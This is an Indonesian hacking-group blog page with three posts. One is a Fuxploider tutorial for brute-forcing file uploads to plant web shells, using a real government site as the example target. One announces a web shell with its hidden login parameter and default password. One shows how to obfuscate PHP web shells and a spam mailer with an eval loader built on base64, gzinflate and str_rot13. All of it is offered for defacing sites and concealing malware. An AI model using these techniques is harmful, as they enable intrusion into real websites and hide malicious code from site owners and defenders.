Tampilkan postingan dengan label Shell. Tampilkan semua postingan



Hai gays kembali lagi bersama gw yukinoshita47 kali ini gw mau share tutorial lagi kali ini tutorial tentang Vulnerability Analysis yang mungkin cocok buat wajah-wajah tukang upload shell kayak lu pade wkwkwkwkwkwk

oke langsung aja

pertama buka terminal



kemudian download tools nya dari github dengan menggunakan perintah

git clone https://github.com/almandin/fuxploider

kemudian tekan enter



kemudian masuk ke dalam direktori tools nya dengan menggunakan perintah

cd fuxploider

kemudian tekan enter



kemudian install dulu python3-pip nya

khusus untuk kali linux versi lama atau versi dibawah tahun 2018

gunakan perintah

apt-get install python3-pip

kemudian tekan enter

---

khusus untuk kali linux 2018 dan yang terbaru

gunakan perintah

apt install python3-pip

kemudian tekan enter





kemudian install dependencies nya dengan menggunakan perintah

pip3 install -r requirements.txt

kemudian tekan enter


setelah selesai install dependencies nya
jalankan tools nya dengan menggunakan perintah

python3 fuxploider.py

kemudian tekan enter

untuk melihat informasi tools gunakan perintah

python3 fuxploider.py -h

kemudian tekan enter



lalu bagaimana cara gunakan tools nya untuk uji coba target nya ?

kita test

cara nya gunakan perintah

python3 fuxploider.py --url http://situstarget.com/letak-file-upload.php --not-regex "wrong file type"

contoh

python3 fuxploider.py --url http://www.itjen.depkes.go.id/public/filemanager/img/ico_dark/uploader.php --not-regex "wrong file type"

kemudian tekan enter maka tool nya akan coba validasi extensi file yang akan di upload



tekan y untuk coba bruteforce upload file shell nya


contoh jika bruteforce upload shell nya berhasil akan muncul seperti gambar dibawah ini


oke cukup sampai disini tutorial kali ini gays kalo ada salah dan kurang dimaklumi aja gays  sampai jumpa di tutorial selanjutnya

sekian dan terimakasih

regard

Drs. Yukinoshita47. HAMBA ALLAH YANG MENCARI RIDHO NYA



Garuda Security Hacker Official Team



Official Website Portal : Garuda Security Hacker | Official Website Portal
Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel

Kali Linux : Arbitrary File Upload Vulnerability Scanning Dengan Fuxploider

[SHELL] x48x Web Shell

[SHELL] x48x Web Shell


_Tuan2Fay_ | blog.garudasecurityhacker.org - setelah sebelumnya ane ngerilis mini shell, skrng ane rilis versi anunya (entahlah :v).
pada dasarnya shell ini cuma mengambil function dan tool dari shell yg udah ada sebelumnya,, ini cuma kerjaan ane saat iseng2 aja :v jadi mohon maaf klo tercyduck banyak kekurangannya :( :(

Fitur :

Fitur jg ga banyak2 amat,, ane masukin yg sering di pake sama orang2 aja :v
sama ane modif dikit fitur login nya..
Untuk lebih detail nya cek sendiri aja ya :p

Tampilan :

[SHELL] x48x Web Shell
Sebelum Tercyduck

[SHELL] x48x Web Shell
Sesudah Tercyduck

[SHELL] x48x Web Shell
Sesudah Tercyduck dan Login

Note :
  • Buat munculin form loginnya tinggal di tambahin ?ez=login contoh : x48x.php?ez=login
  • Default passwordnya : melodynl (bisa di ganti sendiri)

Link : Pasted.co



Garuda Security Hacker Official Team



Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel

[SHELL] x48x Web Shell

Tutorial Encode Script PHP

Garuda Security Hacker


_Tuan2Fay_ | blog.garudasecurityhacker.org -
yoshh apakabar,, sorry pake foto oshi soalnya gw bingung mau pake gambar apalagi biar menarik :v,, sesuai judul gw bakalan ngasih tutorial cara Encode Script PHP, berlaku juga Webshell yg di pake buat depes web,, kenapa di encode ? supaya gak mudah di Recode sama orng,, kalau pun mau ngeRecode ya harus di Decode dlu,, itu pun kalo berhasil. Ok langsung aja eue tutorial nya,,

Bahan Bahan :

1. Script PHP yang mau di Encode
2. Tool buat ngeEncode ( http://scriptencode.net/ )
3. Editor Text (Notepad, Gedit, Bluefish, Nano, dll)

Step by Step :

1. Baca Bismillah dlu kuy,,

2. Buka url Tool buat ngeEncode (link di atas)

3. Buka Script yg mau di encode
di sini saya pake script Mailer spam karya Lyonc (ntar script nya di post ke sini)
 
4. Copy code nya tapi jagan pake <?php (yg di atas) sama ?> (yang paling bawah) liat gambar biar rada seger


Tutorial Encode Script PHP

tapi kenapa saya gak bawa $auth_pass = 'md5 hash'; nya ? sengaja biar bisa di ganti2

5. Copy ke tool nya,, terus kita pilih type yg "base64 - gzinflate - str_rot13 - convert_uu - gzinflate - base64" aja,, terus langsung klik Encode

Tutorial Encode Script PHP

6. Kita beralih ke text editor/notepad dll, bikin file baru,, lau copy kode di bawah.
<?php

$file = 'isi dengan kode hasil encode';
eval(base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode($file)))))));
 

?>

save dengan format .php

Note : Kalo Script yang kalian encode ada session loginnya,, password yg ga di encode bisa di taro di atas $file, contoh

$auth_pass = 'md5 hash';
$file = 'hasil encode';

 itu pun kalo memang ada atau sengaja ga ikut di encode,

segitu dlu aja yah,, cape ngetik + duduk lama2, mohon maaf klo sulit di pahami atau kurang detail tutorialnya,, kalau mau bertanya bisa komen di bawah atau chat ke FP kami kuy,,


Garuda Security Hacker Official Team



Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel

Tutorial Encode Script PHP

- Copyright © Family Cyber Exploit - Blogger Templates - Powered by Blogger - Designed by Johanes Djogan -